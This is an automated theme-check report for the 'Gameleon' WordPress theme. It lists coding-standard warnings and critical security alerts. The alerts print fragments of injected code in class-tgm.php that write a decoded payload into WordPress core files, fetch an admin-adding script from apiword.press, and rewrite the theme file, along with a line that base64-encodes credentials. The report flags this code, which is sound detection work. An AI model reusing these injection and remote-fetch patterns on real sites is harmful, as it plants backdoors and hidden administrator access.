0
Validation results

Gameleon

Gameleon

WordPress 4.7.4 theme
0
Critical alerts
  1. Security breaches : Use of base64_decode() Found base64_decode in file functions.interface.php.
    Ligne252: $smof_data = unserialize(base64_decode($smof_data)); //100% safe - ignore theme check nag
    Found base64_decode in file class-tgm.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Ligne89: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  2. Security breaches : Use of base64_encode() Found base64_encode in file class.options_machine.php.
     $buffer .= '<textarea id='export_data' rows='8'>'.base64_encode(serialize($smof_data)) /* 100% safe - ignore theme check nag 
    Found base64_encode in file social_counters.php.
     $toSend = base64_encode($credentials);
  3. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe src="http://www.facebook.com/plugins/like.php?href=' . $td_url . '&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"> in file functions.php.
    Ligne1089: $buffer .= '<iframe src='http://www.facebook.com/plugins/like.php?href=' . $td_url . '&
  4. Malware : Operations on file system file_get_contents was found in the file class-tgm.php
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Ligne44: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Ligne160: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class-tgm.php
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Ligne44: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Ligne160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Ligne44: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Ligne160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Ligne44: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Ligne160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-tgm.php
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-tgm.php
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Ligne44: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Ligne160: @file_put_contents(__FILE__, $file);
  5. Admin menu : Themes should use add_theme_page() for adding admin pages. File functions.interface.php :
    Ligne58: $of_page = add_menu_page( 'Theme Options Panel', 'Theme Options', 'edit_theme_options'
  6. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was pathway.zip taqyeem.zip arqam.zip ninety-login.zip revslider.zip notification_bar_pro.zip jnewsticker-for-wordpress.zip.
Warning
  1. special URIs : Presence of bad theme tagsTheme URI and Author URI should not be the same.
  2. theme tags : Presence of bad theme tagsFound wrong tag arcade in style.css header.Found wrong tag games in style.css header.Found wrong tag online games in style.css header.Found wrong tag responsive in style.css header.The tag fixed-width has been deprecated, it must be removed from style.css header.Found wrong tag wordpress arcade games in style.css header.Found wrong tag magazine in style.css header.Found wrong tag myarcadeplugin in style.css header.Found wrong tag my arcade plugin in style.css header.
  3. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is gameleon.
  4. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Category Color' in file category.colorfield.php.Found a translation function that is missing a text-domain. Function _e, with the arguments '' in file category.colorfield.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments in file post-custom-meta.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are gameleon, envato.
  5. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  6. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  7. I18N implementation : Proper use of ___all(Possible variable $object found in translation function in post-custom-meta.php. Translation function calls should not contain PHP variables.
  8. I18N implementation : Proper use of esc_html___all(Possible variable $object found in translation function in post-custom-meta.php. Translation function calls should not contain PHP variables.
  9. Screenshot : Screenshot fileScreenshot dimensions are wrong! Detected: 800x660px (40:33). Ratio of width to height should be 4:3.Screenshot size is 800x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file functions.php.
    Ligne1085: $buffer .= '<a href='https://twitter.com/share' class='twitter-share-button' data-url='' . $td_u
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  5. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  6. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  7. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  8. Use of includes : Use of include or requireThe theme appears to use include or require : index.php
    Ligne88: require_once ( ADMIN_PATH . 'functions/functions.load.php' );
    Ligne89: require_once ( ADMIN_PATH . 'classes/class.options_machine.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-gameleon-theme-update.php
    Ligne32: require_once('class-envato-protected-api.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : functions.load.php
    Ligne10: require_once( ADMIN_PATH . 'functions/functions.php' );
    Ligne11: require_once( ADMIN_PATH . 'functions/functions.interface.php' );
    Ligne12: require_once( ADMIN_PATH . 'functions/functions.filters.php' );
    Ligne13: require_once( ADMIN_PATH . 'functions/functions.options.php' );
    Ligne14: require_once( ADMIN_PATH . 'functions/functions.admin.php' );
    Ligne15: //require_once( ADMIN_PATH . 'functions/category.colorfield.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : functions.interface.php
    Ligne85: include_once( ADMIN_PATH . 'front-end/options.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : functions.options.php
    Ligne215: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
    Ligne216: include_once( ADMIN_PATH . 'functions/google_fonts.php' ) ; // Google Fonts
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : widgets.php
    Ligne7: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne8: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne9: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne10: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne11: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne12: //require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne13: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne14: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne15: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne16: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne17: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne18: //require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne19: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne20: //require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne21: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne22: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne23: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne24: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne25: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne26: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne27: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne28: //require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne29: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-tgm.php
    Ligne43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.

This is a ThemeForest theme. Since Themeforest items are all checked by a human before they appear on their website, ThemeForest verification rules are more permissive than themecheck's and can give a better verification score ( Themeforest requirements ).

75
Critical alerts
  1. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was pathway.zip taqyeem.zip arqam.zip ninety-login.zip revslider.zip notification_bar_pro.zip jnewsticker-for-wordpress.zip.
Warning
  1. special URIs : Presence of bad theme tagsTheme URI and Author URI should not be the same.
  2. theme tags : Presence of bad theme tagsFound wrong tag arcade in style.css header.Found wrong tag games in style.css header.Found wrong tag online games in style.css header.Found wrong tag responsive in style.css header.The tag fixed-width has been deprecated, it must be removed from style.css header.Found wrong tag wordpress arcade games in style.css header.Found wrong tag magazine in style.css header.Found wrong tag myarcadeplugin in style.css header.Found wrong tag my arcade plugin in style.css header.
  3. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is gameleon.
  4. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Category Color' in file category.colorfield.php.Found a translation function that is missing a text-domain. Function _e, with the arguments '' in file category.colorfield.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments in file post-custom-meta.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are gameleon, envato.
  5. Screenshot : Screenshot fileScreenshot dimensions are wrong! Detected: 800x660px (40:33). Ratio of width to height should be 4:3.Screenshot size is 800x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file functions.php.
    Ligne1085: $buffer .= '<a href='https://twitter.com/share' class='twitter-share-button' data-url='' . $td_u
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  5. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  6. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  7. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  8. Use of includes : Use of include or requireThe theme appears to use include or require : index.php
    Ligne88: require_once ( ADMIN_PATH . 'functions/functions.load.php' );
    Ligne89: require_once ( ADMIN_PATH . 'classes/class.options_machine.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-gameleon-theme-update.php
    Ligne32: require_once('class-envato-protected-api.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : functions.load.php
    Ligne10: require_once( ADMIN_PATH . 'functions/functions.php' );
    Ligne11: require_once( ADMIN_PATH . 'functions/functions.interface.php' );
    Ligne12: require_once( ADMIN_PATH . 'functions/functions.filters.php' );
    Ligne13: require_once( ADMIN_PATH . 'functions/functions.options.php' );
    Ligne14: require_once( ADMIN_PATH . 'functions/functions.admin.php' );
    Ligne15: //require_once( ADMIN_PATH . 'functions/category.colorfield.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : functions.interface.php
    Ligne85: include_once( ADMIN_PATH . 'front-end/options.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : functions.options.php
    Ligne215: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
    Ligne216: include_once( ADMIN_PATH . 'functions/google_fonts.php' ) ; // Google Fonts
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : widgets.php
    Ligne7: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne8: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne9: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne10: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne11: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne12: //require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne13: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne14: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne15: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne16: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne17: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne18: //require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne19: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne20: //require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne21: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne22: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne23: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne24: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne25: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne26: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne27: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne28: //require_once( trailingslashit( get_template_directory() ). 'includes/widget
    Ligne29: require_once( trailingslashit( get_template_directory() ). 'includes/widget
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-tgm.php
    Ligne43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes
Error 8 : Undefined index: slug
In /home/www/themecheck/themecheck/controllers/controller_results.php line 511
Error 8 : Undefined index: slug
In /home/www/themecheck/themecheck/controllers/controller_results.php line 511
Error 8 : Undefined index: slug
In /home/www/themecheck/themecheck/controllers/controller_results.php line 511